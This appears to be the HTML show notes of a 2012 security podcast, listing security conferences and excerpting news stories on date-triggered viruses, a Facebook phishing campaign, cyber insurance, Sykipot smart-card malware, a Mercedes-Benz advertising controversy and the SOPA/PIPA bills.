	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br />
	</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://nakedsecurity.sophos.com/2012/01/13/friday-the-thirteenth-in-memory-of-malware-mayhem"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2012/01/13/friday-the-thirteenth-in-memory-of-malware-mayhem</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s Friday the Thirteenth, an infamous date in the history of malware.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So here&#39;s a satirical trip down memory lane to consider other </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">dies irae</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in the computer virus calendar:</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Jerusalem virus</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">deletes files on any Friday the 13th from 1988 onwards</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This virus came out in 1987 but explicitly suppressed its payload that year (when Friday 13ths happened in February, March and November). In those pre-internet malware days, it needed to give itself months to spread before making its bid for infamy.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Durban virus</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">zaps your hard disk on any Saturday the 14th</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Durban virus first appeared in South Africa, following advice to South African public servants to &quot;put their computer clocks forward a day&quot; before going home on Thursday 12th, as a temporary mechanism to minimise the risk of damage from the Jerusalem virus.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Sunday virus</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">deletes files every Sunday, and asks you &quot;Today is SunDay! Why do you work so hard?&quot;</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Except, however, that it doesn&#39;t actually trigger its warhead due to a bug. You can imagine why the malware author didn&#39;t get around to testing that part of the code.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Honni virus</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">pops up a picture of Erich Honecker on Saturday 13 August 1994</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That&#39;s the 33rd anniversary of the creation of the Berlin Wall. The late and unlamented Honecker, former leader of the DDR, had recently died in exile in Chile.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Stuxnet virus</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">mentions Wednesday 09 May 1979 in its code</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The virus commemorates the performance on that day of the Grateful Dead in Binghamton, New York. (You can hear the audience cheer when the lyrics of the song &quot;Truckin&#39;&quot; reach </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">New York</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in the sound-clip below.)</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;. </span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.securelist.com/en/blog/208193325/Facebook_Security_Phishing_Attack_In_The_Wild"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securelist.com/en/blog/208193325/Facebook_Security_Phishing_Attack_In_The_Wild</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is a new Facebook phishing attack going on. It will not just try to steal your Facebook credentials; it will also try to steal credit card information and other important information such as security questions.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This Facebook phishing attack is pretty interesting because it does not just try to trick the victim into visiting a phishing website. It will reuse the stolen information and login to the compromised account and change both profile picture and name. The profile picture will be changed to the Facebook logo and the name will be translated to &ldquo;Facebook Security&rdquo; but containing special ascii characters replacing letters such as &ldquo;a&rdquo; &ldquo;k&rdquo; &ldquo;S&rdquo; and &ldquo;t&rdquo;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once an account is compromised it will also send out a message to all contacts of the compromised account. The message looks like this:</span><img height="288px;" src="https://lh3.googleusercontent.com/Q3KTkBQ0CgOQi4-vCmJg1Jo837B3qWf0CJNXD2hwg8QBkZz3pXjWjil2PNk9lpJy4TdvXp4qVROQ4hYN1lGwyWqQBZLMMIlJ75VUQbjkWR3922WihBA" width="267px;" /></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Last Warning: Your Facebook account will be turned off Because someone has reported you. Please do re-confirm your account security by: =&gt; http://apps-xxxx-xxxxx-user.de.vu</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thank you. The Facebook Team&quot;/</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9223366/Cyber_insurance_offers_IT_peace_of_mind_or_maybe_not"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9223366/Cyber_insurance_offers_IT_peace_of_mind_or_maybe_not</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If your company were hit with a cyber attack today, would it be able to foot the bill? The </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">entire</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> bill, including costs from regulatory fines, potential lawsuits, damage to your organization&#39;s brand, and hardware and software repair, recovery and protection?</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s a question worth careful consideration, given that the price of cyber attacks is rising at an alarming rate.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The second annual</span><a href="http://www.scribd.com/doc/64020942/Annual-Ponemon-Cost-of-Cyber-Crime-Study"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Cost of Cyber Crime study</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, released last August by the</span><a href="http://www.ponemon.org/index.php"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Ponemon Institute</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, reported that the median annualized cost of detection of and recovery from cyber crime per company is $5.9 million &#8212; a 56% increase from the 2010 median figures. The costs of cyber crime range from $1.5 million to $36.5 million per company.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A growing number of insurance companies are offering cyber protection in the event of breaches and other malicious data attacks. But so far, they&#39;re having some difficulty making their case. Surveys show companies have yet to embrace these policies, whose costs can be staggering.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.techworld.com/security/3329897/chinese-attack-us-dod-smart-cards-with-sykipot-malware"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3329897/chinese-attack-us-dod-smart-cards-with-sykipot-malware</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A new strain of the Sykipot malware is being used by Chinese cyber criminals to compromise US Department of Defense (DoD) smart cards, a new report has revealed.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The malware has been designed to take advantage of smart card readers running ActivClient &ndash; the client application of ActivIdentity &ndash; according to unified security information and event management (SIEM) company AlienVault.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ActivIdentity&#39;s smart cards are standardised at the DoD and a number of other US government agencies. The cards are used to identify active duty military staff, selected reserve personnel, civilian employees, and eligible contractor staff.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As with previous Sykipot strains, the attackers use an email campaign to get specific targets to click on a link and deposit the Sykipot malware onto their machines. After identifying the computers that have card readers, the attackers install keystroke logging software to steal the PIN number that is used in concert with the smart card.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://blog.heritage.org/2012/01/11/mercedes-benz-uses-communist-madman-che-guevara-to-sell-luxury-cars/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.heritage.org/2012/01/11/mercedes-benz-uses-communist-madman-che-guevara-to-sell-luxury-cars/</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There&#39;s something about Che Guevara that convinces older European men that they will become cooler through association with his &quot;brand.&quot; We saw that again yesterday when Mercedes-Benz Chairman Dieter Zetsche launched a new car</span><a href="http://www.cbsnews.com/8301-205_162-57356428/mercedes-channels-che-guevara-for-car-tech/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">under a banner picture of Guevara</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. </span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To Mercedes-Benz&#39;s credit, it apologized 48 hours after the event. &nbsp;&quot;In his keynote speech at CES, Dr. Zetsche addressed the revolution in automobility enabled by new technologies, in particular those associated with connectivity. To illustrate this point, the company briefly used a photo of revolutionary Che Guevara (it was one of many images and videos in the presentation) &hellip;We sincerely apologize to those who took offense,&quot; the statement said.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When further pressed on the matter, Daimler spokesman Han Tjan said the image appeared for &quot;only a few seconds&quot; during the 45-minute &quot;Power Point&quot; presentation.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It was very thoughtless not to realize that by doing that, it would offend a large number of people,&quot; Tjan said.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Unfortunately, the word &lsquo;revolutionary&rsquo; triggered a picture of Che Guevara &hellip; which may indicate the age of the person who did it,&rdquo; he said. &quot;That fell between the cracks &hellip; It was absolutely stupid that somebody did it.&quot;</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I personally have questioned people that wear those Che Guevara shirts. &nbsp;This sorta sums up my opinion on those that would.</span><img height="355px;" src="https://lh3.googleusercontent.com/ivPnBVtJlNoljLg3x2UVteFsD3eWDtdWvATijR1fkEtRfl78OvTvknyQjPrWNvCqu5-WWTOXbT1CS7bKSh3t1DjmYaZBHAmLavn4cMpSq16q2gUmLT0" width="443px;" /></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.stanforddaily.com/2012/01/13/law-professors-react-to-pipa-sopa-legislation/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.stanforddaily.com/2012/01/13/law-professors-react-to-pipa-sopa-legislation/</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Congress is expected to consider two bills when it returns from recess on Jan. 24: the Preventing Real Online Threats to Economic Creativity and Theft of Intellectual Property Act (PROTECT IP Act or PIPA) and the Stop Online Piracy Act (SOPA). The legislation is of major concern to Stanford thought leaders, in addition to nationwide legal experts, online security experts, Internet activists and the founders of many of Silicon Valley&rsquo;s largest companies.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The answer is to innovate, not to pass stupid laws that are going to screw up the Internet,&rdquo; said</span><a href="http://cyberlaw.stanford.edu/profile/anthony-falzone"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Anthony Falzone</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, executive director of the Fair Use Project at the Stanford Center for Internet and Society (SCIS) at a Dec. 7 event hosted by SCIS called, &ldquo;What&rsquo;s wrong with SOPA?&rdquo; The panel convened experts on Internet infrastructure and security, digital intellectual property and Silicon Valley business to articulate many of SOPA&rsquo;s problems.</span></div>
